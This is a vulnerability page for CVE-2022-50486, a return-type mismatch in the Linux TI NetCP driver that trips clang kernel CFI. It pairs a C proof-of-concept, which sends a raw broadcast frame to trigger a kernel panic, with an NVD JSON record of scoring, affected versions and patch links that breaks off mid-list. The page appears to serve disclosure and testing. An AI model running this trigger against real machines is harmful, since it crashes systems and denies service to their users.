CVE-2022-50486

/* PoC for CVE-2022-50486 - Trigger netcp_ndo_start_xmit() to cause CFI failure * This PoC demonstrates how to trigger the vulnerability by sending packets * through a TI NetCP network interface when CONFIG_CFI_CLANG is enabled. * * Note: Requires a system with TI NetCP ethernet driver loaded and CFI enabled. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <net/if.h> #include <netinet/in.h> #include <arpa/inet.h> #include <linux/if_packet.h> #define INTERFACE_NAME "eth0" /* TI NetCP interface name */ int main(int argc, char *argv[]) { int sockfd; struct ifreq ifr; struct sockaddr_ll addr; char buffer[64]; /* Create a raw socket to send packets */ sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); if (sockfd < 0) { perror("socket creation failed"); return 1; } /* Get interface index for the TI NetCP device */ memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, INTERFACE_NAME, IFNAMSIZ - 1); if (ioctl(sockfd, SIOCGIFINDEX, &ifr) < 0) { perror("ioctl SIOCGIFINDEX failed"); close(sockfd); return 1; } /* Set up the socket address structure */ memset(&addr, 0, sizeof(addr)); addr.sll_family = AF_PACKET; addr.sll_protocol = htons(ETH_P_ALL); addr.sll_ifindex = ifr.ifr_ifindex; addr.sll_halen = ETH_ALEN; /* Bind to the interface */ if (bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)) < 0) { perror("bind failed"); close(sockfd); return 1; } /* Prepare a minimal ethernet frame to trigger transmission */ memset(buffer, 0, sizeof(buffer)); /* Destination MAC */ buffer[0] = 0xff; buffer[1] = 0xff; buffer[2] = 0xff; buffer[3] = 0xff; buffer[4] = 0xff; buffer[5] = 0xff; /* Source MAC */ buffer[6] = 0x00; buffer[7] = 0x01; buffer[8] = 0x02; buffer[9] = 0x03; buffer[10] = 0x04; buffer[11] = 0x05; /* EtherType */ buffer[12] = 0x08; buffer[13] = 0x00; printf("Sending packet through %s to trigger ndo_start_xmit...\n", INTERFACE_NAME); /* Send the packet - this will invoke netcp_ndo_start_xmit() */ /* With CFI enabled, this triggers a kernel panic due to type mismatch */ if (send(sockfd, buffer, sizeof(buffer), 0) < 0) { perror("send failed"); } printf("Packet sent. Check kernel logs for CFI violation or panic.\n"); close(sockfd); return 0; }

{"cve": {"id": "CVE-2022-50486", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:45.463", "lastModified": "2026-03-25T00:27:12.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ethernet: ti: Fix return type of netcp_ndo_start_xmit()\n\nWith clang's kernel control flow integrity (kCFI, CONFIG_CFI_CLANG),\nindirect call targets are validated against the expected function\npointer prototype to make sure the call target is valid to help mitigate\nROP attacks. If they are not identical, there is a failure at run time,\nwhich manifests as either a kernel panic or thread getting killed. A\nproposed warning in clang aims to catch these at compile time, which\nreveals:\n\n drivers/net/ethernet/ti/netcp_core.c:1944:21: error: incompatible function pointer types initializing 'netdev_tx_t (*)(struct sk_buff *, struct net_device *)' (aka 'enum netdev_tx (*)(struct sk_buff *, struct net_device *)') with an expression of type 'int (struct sk_buff *, struct net_device *)' [-Werror,-Wincompatible-function-pointer-types-strict]\n .ndo_start_xmit = netcp_ndo_start_xmit,\n ^~~~~~~~~~~~~~~~~~~~\n 1 error generated.\n\n->ndo_start_xmit() in 'struct net_device_ops' expects a return type of\n'netdev_tx_t', not 'int'. Adjust the return type of\nnetcp_ndo_start_xmit() to match the prototype's to resolve the warning\nand CFI failure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0", "versionEndExcluding": "4.9.337", "matchCriteriaId": "BA64B5FB-BACC-4DBE-8CD2-71F7F80286BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.303", "matchCriteriaId": "1E7450AD-4739-46F0-B81B-C02E7B35A97B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/17bb9bdf701f3e811a9f4820b08b9538ade2641c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/1e4953b826e12b31995564a459dbd4e9e4604a35", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5b0b6553bf4ad3a435a57e02c68d6075f384e1be", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/63fe6ff674a96cfcfc0fa8df1051a27aa31c70b4", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/765636e58ba505cfe4927eda7ee83791b1c6402a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a413ebb6049edd881c6427cfa25a7efddd6a4f74", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a447479ea2cf35603b5739ea947885024b901222", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": ... (truncated)